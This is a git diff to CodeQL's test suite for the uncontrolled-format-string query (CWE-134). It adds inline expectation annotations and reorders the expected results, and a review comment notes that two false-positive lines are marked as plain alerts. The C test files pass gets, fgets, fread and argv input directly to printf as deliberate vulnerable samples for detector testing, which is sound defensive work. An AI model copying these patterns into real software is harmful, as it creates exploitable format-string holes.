| consts.cpp:103:2:103:7 | call to printf | printf | +| consts.cpp:107:9:107:10 | *v5 | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:107:2:107:7 | call to printf | printf | +| consts.cpp:112:9:112:10 | *v6 | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:112:9:112:10 | *v6 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:112:2:112:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | +| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | +| consts.cpp:130:9:130:10 | *v9 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | +| consts.cpp:130:9:130:10 | *v9 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | +| consts.cpp:135:9:135:11 | *v10 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:135:2:135:7 | call to printf | printf | +| consts.cpp:135:9:135:11 | *v10 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | +| consts.cpp:140:9:140:11 | *v11 | consts.cpp:139:13:139:16 | readString output argument | consts.cpp:140:9:140:11 | *v11 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:140:2:140:7 | call to printf | printf | +| consts.cpp:145:9:145:11 | *v12 | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:145:2:145:7 | call to printf | printf | edges | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:30:9:30:14 | *access to array | provenance | | | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:123:2:123:12 | *... = ... | provenance | | 
@@ -69,27 +93,3 @@ nodes | consts.cpp:144:16:144:18 | readStringRef output argument | semmle.label | readStringRef output argument | | consts.cpp:145:9:145:11 | *v12 | semmle.label | *v12 | subpaths -#select -| consts.cpp:86:9:86:10 | *v1 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:86:2:86:7 | call to printf | printf | -| consts.cpp:91:9:91:10 | *v2 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:91:9:91:10 | *v2 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:91:2:91:7 | call to printf | printf | -| consts.cpp:95:9:95:10 | *v3 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | -| consts.cpp:95:9:95:10 | *v3 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | -| consts.cpp:100:9:100:10 | *v4 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | -| consts.cpp:100:9:100:10 | *v4 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:100:2:100:7 | call to printf | printf | -| consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:103:2:103:7 | call to printf | printf | -| consts.cpp:107:9:107:10 | *v5 | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:107:2:107:7 | call to printf | printf | -| consts.cpp:112:9:112:10 | *v6 | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:112:9:112:10 | *v6 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:112:2:112:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | -| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | -| consts.cpp:130:9:130:10 | *v9 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:130:2:130:7 | call to printf | printf | -| consts.cpp:130:9:130:10 | *v9 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | -| consts.cpp:135:9:135:11 | *v10 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | -| consts.cpp:135:9:135:11 | *v10 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | -| consts.cpp:140:9:140:11 | *v11 | consts.cpp:139:13:139:16 | readString output argument | consts.cpp:140:9:140:11 | *v11 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:140:2:140:7 | call to printf | printf | -| consts.cpp:145:9:145:11 | *v12 | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:145:2:145:7 | call to printf | printf | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.qlref index 83622f12b4d9..cb71273232ca 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.qlref 
@@ -1 +1,2 @@
-Likely Bugs/Format/NonConstantFormat.ql
\ No newline at end of file
+query: Likely Bugs/Format/NonConstantFormat.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/consts.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/consts.cpp
index 7242bedc133e..b3815dfd0b7c 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/consts.cpp
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/consts.cpp
@@ -82,65 +82,65 @@ void a() { // BAD: v1 value came from the user char v1[100]; - gets(v1); - printf(v1); + gets(v1); // $ Source + printf(v1); // $ Alert // BAD: v2 value came from the user char *v2; - v2 = gets(v1); - printf(v2); + v2 = gets(v1); // $ Source + printf(v2); // $ Alert // BAD: v3 value is copied from v1, which came from the user char *v3 = v1; - printf(v3); + printf(v3); // $ Alert // BAD: v4 value is copied from v1, which came from the user char *v4; v4 = v1; - printf(v4); + printf(v4); // $ Alert // BAD: varFunc() is not defined, so it may not be constant - printf(varFunc()); + printf(varFunc()); // $ Alert // BAD: varFunc() is not defined, so it may not be constant - char *v5 = varFunc(); - printf(v5); + char *v5 = varFunc(); // $ Source + printf(v5); // $ Alert // BAD: varFunc() is not defined, so it may not be constant char *v6; - v6 = varFunc(); - printf(v6); + v6 = varFunc(); // $ Source + printf(v6); // $ Alert // BAD: all elements of v7 came from the user char *v7[] = { v1, v2 }; - printf(v7[0]); + printf(v7[0]); // $ Alert // BAD: v8 started as constant, but changed to a value that came from the user char *v8 = "a"; v8 = v7[1]; - printf(v8); + printf(v8); // $ Alert gv1[1] = v1; // BAD: nonConstFuncToArray() always returns a value from gv1, which is started as constant but was changed to a value that came from the user - printf(nonConstFuncToArray(0)); + printf(nonConstFuncToArray(0)); // $ Alert // BAD: v9 value is copied from v1, which came from the user const char *v9 = v1; - printf(v9); + printf(v9); // $ Alert // BAD: v10 value is derived from values that are not constant char v10[10]; sprintf(v10, "%s", v1); - printf(v10); + printf(v10); // $ Alert // BAD: v11 is initialized via a pointer char *v11; - readString(&v11); - printf(v11); + readString(&v11); // $ Source + printf(v11); // $ Alert // BAD: v12 is initialized via a reference char *v12; - readStringRef(v12); - printf(v12); + readStringRef(v12); // $ Source + printf(v12); // $ 
Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.c index d2b28baac236..23a05e1ec50a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.c @@ -13,8 +13,8 @@ FILE *f; int main(int argc, char **argv) { // BAD: i1 comes from the user char i1[1024]; - fread(i1, sizeof(char), 1024, f); - printf(i1); + fread(i1, sizeof(char), 1024, f); // $ Source + printf(i1); // $ Alert // GOOD: i2 comes from the user, but is not the format string here char i2[1024]; @@ -23,39 +23,39 @@ int main(int argc, char **argv) { // BAD: i3 comes from the user char i3[1024]; - fgets(i3, 1, 0); - printf(i3); + fgets(i3, 1, 0); // $ Source + printf(i3); // $ Alert // BAD: i4 comes from the user char i41[1024]; - char *i4 = fgets(i41, 1, f); - printf(i4); + char *i4 = fgets(i41, 1, f); // $ Source + printf(i4); // $ Alert // BAD: i5 comes from the user char i5[1024]; - gets(i5); - printf(i5); + gets(i5); // $ Source + printf(i5); // $ Alert // BAD: i6 comes from the user char i61[1024]; - char *i6 = gets(i61); - printf(i6); + char *i6 = gets(i61); // $ Source + printf(i6); // $ Alert // BAD: i7 comes from the user char **i7; - gets(*i7); - printf(*i7); + gets(*i7); // $ Source + printf(*i7); // $ Alert // BAD: i8 comes from the user char i81[1024]; char **i8; - *i8 = gets(i81); - printf(*i8); + *i8 = gets(i81); // $ Source + printf(*i8); // $ Alert // BAD: e1 comes from i1, which comes from the user char e1[1]; e1[0] = i1[0]; - printf(e1); + printf(e1); // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected index 4447b215aedf..3966ccbf52fd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected 
@@ -1,3 +1,12 @@ +#select +| funcsLocal.c:17:9:17:10 | *i1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | +| funcsLocal.c:27:9:27:10 | *i3 | funcsLocal.c:26:8:26:9 | fgets output argument | funcsLocal.c:27:9:27:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:26:8:26:9 | fgets output argument | string read by fgets | +| funcsLocal.c:32:9:32:10 | *i4 | funcsLocal.c:31:13:31:17 | *call to fgets | funcsLocal.c:32:9:32:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:31:13:31:17 | *call to fgets | string read by fgets | +| funcsLocal.c:37:9:37:10 | *i5 | funcsLocal.c:36:7:36:8 | gets output argument | funcsLocal.c:37:9:37:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:36:7:36:8 | gets output argument | string read by gets | +| funcsLocal.c:42:9:42:10 | *i6 | funcsLocal.c:41:13:41:16 | *call to gets | funcsLocal.c:42:9:42:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:41:13:41:16 | *call to gets | string read by gets | +| funcsLocal.c:47:9:47:11 | ** ... | funcsLocal.c:46:7:46:9 | gets output argument | funcsLocal.c:47:9:47:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:46:7:46:9 | gets output argument | string read by gets | +| funcsLocal.c:53:9:53:11 | ** ... | funcsLocal.c:52:8:52:11 | *call to gets | funcsLocal.c:53:9:53:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| funcsLocal.c:52:8:52:11 | *call to gets | string read by gets | +| funcsLocal.c:58:9:58:10 | *e1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:58:9:58:10 | *e1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | edges | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | provenance | | | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:57:2:57:14 | ... = ... | provenance | | 
@@ -32,12 +41,3 @@ nodes | funcsLocal.c:57:2:57:14 | ... = ... | semmle.label | ... = ... | | funcsLocal.c:58:9:58:10 | *e1 | semmle.label | *e1 | subpaths -#select -| funcsLocal.c:17:9:17:10 | *i1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | -| funcsLocal.c:27:9:27:10 | *i3 | funcsLocal.c:26:8:26:9 | fgets output argument | funcsLocal.c:27:9:27:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:26:8:26:9 | fgets output argument | string read by fgets | -| funcsLocal.c:32:9:32:10 | *i4 | funcsLocal.c:31:13:31:17 | *call to fgets | funcsLocal.c:32:9:32:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:31:13:31:17 | *call to fgets | string read by fgets | -| funcsLocal.c:37:9:37:10 | *i5 | funcsLocal.c:36:7:36:8 | gets output argument | funcsLocal.c:37:9:37:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:36:7:36:8 | gets output argument | string read by gets | -| funcsLocal.c:42:9:42:10 | *i6 | funcsLocal.c:41:13:41:16 | *call to gets | funcsLocal.c:42:9:42:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:41:13:41:16 | *call to gets | string read by gets | -| funcsLocal.c:47:9:47:11 | ** ... | funcsLocal.c:46:7:46:9 | gets output argument | funcsLocal.c:47:9:47:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:46:7:46:9 | gets output argument | string read by gets | -| funcsLocal.c:53:9:53:11 | ** ... 
| funcsLocal.c:52:8:52:11 | *call to gets | funcsLocal.c:53:9:53:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:52:8:52:11 | *call to gets | string read by gets | -| funcsLocal.c:58:9:58:10 | *e1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:58:9:58:10 | *e1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected index 7408d8360ef5..8f06acca17f1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected 
@@ -1,3 +1,9 @@ +#select +| globalVars.c:27:9:27:12 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:27:9:27:12 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:30:15:30:18 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:30:15:30:18 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:38:9:38:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:38:9:38:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:41:15:41:19 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:41:15:41:19 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:50:9:50:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:50:9:50:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | edges | globalVars.c:8:7:8:10 | **copy | globalVars.c:8:7:8:10 | **copy | provenance | | | globalVars.c:8:7:8:10 | **copy | globalVars.c:27:9:27:12 | *copy | provenance | | 
@@ -55,9 +61,3 @@ subpaths | globalVars.c:30:15:30:18 | *copy | globalVars.c:19:25:19:27 | *str | globalVars.c:19:25:19:27 | *str | globalVars.c:30:15:30:18 | printWrapper output argument | | globalVars.c:35:11:35:14 | *copy | globalVars.c:15:21:15:23 | *val | globalVars.c:15:21:15:23 | *val | globalVars.c:35:11:35:14 | setCopy2 output argument | | globalVars.c:41:15:41:19 | *copy2 | globalVars.c:19:25:19:27 | *str | globalVars.c:19:25:19:27 | *str | globalVars.c:41:15:41:19 | printWrapper output argument | -#select -| globalVars.c:27:9:27:12 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:27:9:27:12 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:30:15:30:18 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:30:15:30:18 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:38:9:38:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:38:9:38:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:41:15:41:19 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:41:15:41:19 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:50:9:50:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:50:9:50:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/globalVars.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/globalVars.c index c36c708eab04..dedeade890aa 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/globalVars.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/globalVars.c @@ -20,14 +20,14 @@ void printWrapper(char *str) { printf(str); } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source copyArgv(argv); // BAD: format comes from argv through copy - printf(copy); + printf(copy); // $ Alert // BAD: format comes from argv through copy - printWrapper(copy); + printWrapper(copy); // $ Alert // GOOD: constant format printf("%s", copy); @@ -35,10 +35,10 @@ int main(int argc, char **argv) { setCopy2(copy); // BAD: format comes from argv through copy2 (that is set to copy that is set to argv[1]) - printf(copy2); + printf(copy2); // $ Alert // BAD: format comes from argv through copy2 (that is set to copy that is set to argv[1]) - printWrapper(copy2); + printWrapper(copy2); // $ Alert // GOOD: constant format printf("%s", copy2); 
@@ -47,5 +47,5 @@ int main(int argc, char **argv) { // Should be GOOD because copy2 has value "asdf" // But we flag this case because once a global variable gets tainted we mark all usages as tainted - printf(copy2); + printf(copy2); // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.c index 3d15905d82d6..b7a8eca6e0f2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.c @@ -13,7 +13,7 @@ int inv(int a) { return !a; } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source int varZero = 0; int varOne = 1; 
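Review bot: The final `printf(copy2); // $ Alert` in globalVars.c marks as an expected result an alert that the comment directly above it describes as a false positive ("Should be GOOD because copy2 has value "asdf""). The inline-expectations syntax can record that distinction, so the line would read `printf(copy2); // $ SPURIOUS: Alert`, which leaves the test passing today and makes the over-tainting of globals visible to whoever later tightens the CWE-134 query. The same applies to `printf(c8); // $ Alert` in the ifs.c hunk at `@@ -59,69 +59,69 @@`, whose comment reads "GOOD: inv(1) returns 0"; `printf(c7)` just above it may be a third case, but its comment lies outside that hunk. main's body starts before this hunk.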
@@ -59,69 +59,69 @@ int main(int argc, char **argv) { char *c7; if (globalZero) c7 = argv[1]; - printf(c7); + printf(c7); // $ Alert // GOOD: inv(1) returns 0 and it never goes inside the if // But we can't handle this case because currently we don't analyse arguments in function calls char *c8; if (inv(1)) c8 = argv[1]; - printf(c8); + printf(c8); // $ Alert // BAD: condition is true and it always goes inside the if char *i1; if (1) i1 = argv[1]; - printf(i1); + printf(i1); // $ Alert // BAD: condition is true and it always goes inside the if char *i2; if (0 == 0) i2 = argv[1]; - printf(i2); + printf(i2); // $ Alert // BAD: condition is true and it always goes inside the if char *i3; if (!0) i3 = argv[1]; - printf(i3); + printf(i3); // $ Alert // BAD: varOne is 1 so condition is true and it always goes inside the if char *i4; if (varOne) i4 = argv[1]; - printf(i4); + printf(i4); // $ Alert // BAD: varZero is 0 so condition is true and it always goes inside the if char *i5; if (!varZero) i5 = argv[1]; - printf(i5); + printf(i5); // $ Alert // BAD: condition is true and it always goes inside the if // But our analysis only handle booleans, so it isn't able the detect that both values are the same (we can handle only 0 == 0) char *i6; if (varOne == varOne) i6 = argv[1]; - printf(i6); + printf(i6); // $ Alert // BAD: globalOne is 1 so condition is true and it always goes inside the if char *i7; if (globalOne) i7 = argv[1]; - printf(i7); + printf(i7); // $ Alert // BAD: we don't know the value of globalUnknown so we have to assume it can be true char *i8; if (globalUnknown) i8 = argv[1]; - printf(i8); + printf(i8); // $ Alert // BAD: inv(0) returns 1 and it always goes inside the if char *i9; if (inv(0)) i9 = argv[1]; - printf(i9); + printf(i9); // $ Alert return 0; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected index e8d852cbcd27..5dad063c999f 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected
